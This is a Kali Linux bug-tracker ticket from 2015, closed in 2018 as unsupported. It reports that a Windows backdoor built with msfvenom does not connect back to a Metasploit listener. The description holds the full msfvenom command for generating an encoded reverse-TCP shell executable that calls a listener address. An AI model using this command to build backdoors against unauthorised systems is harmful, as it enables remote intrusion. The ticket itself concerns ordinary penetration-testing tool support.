View Issue Details
ID | Project | Category | View Status | Date Submitted | Last Update |
---|---|---|---|---|---|
0002618 | Kali Linux | Kali Package Bug | public | 2015-09-04 16:02 | 2018-01-29 12:24 |
Reporter | pentestbox | Assigned To | g0tmi1k | ||
Priority | normal | Severity | minor | Reproducibility | have not tried |
Status | closed | Resolution | suspended | ||
Product Version | 2.0 | ||||
Summary | 0002618: backdoor generated by msfvenom does not work | ||||
Description | When creating an exe backdoor with msfvenom using the following command : msfvenow -p windows/shell/reverse_tcp lhost=192.168.0.22 -f exe -e x86/shikata_ga_nai -o arquivo.exeThe same can not connect back to the listener metasploit , appearing in metasploit like this: Started reverse handler on 192.168.0.22:4444 however it appears an open session by using the session -l command does not appear Session list to use , does not appear any message on screen | ||||
Due to the age of the OS (Kali Moto [v1], Kali Safi [v2], Kali Rolling 2016.x), these legacy versions are no longer supported. Please could you see if you are able to replicate this issue with the latest version of Kali Linux - https://www.kali.org/downloads/)? If you are still facing the same problem, feel free to re-open the ticket. If you choose to do this, could you provide more information to the issue you are facing,and also give information about your setup? |
|
Date Modified | Username | Field | Change |
---|---|---|---|
2015-09-04 16:02 | pentestbox | New Issue | |
2018-01-29 12:24 | g0tmi1k | Assigned To | => g0tmi1k |
2018-01-29 12:24 | g0tmi1k | Status | new => closed |
2018-01-29 12:24 | g0tmi1k | Resolution | open => suspended |
2018-01-29 12:24 | g0tmi1k | Note Added: 0008108 |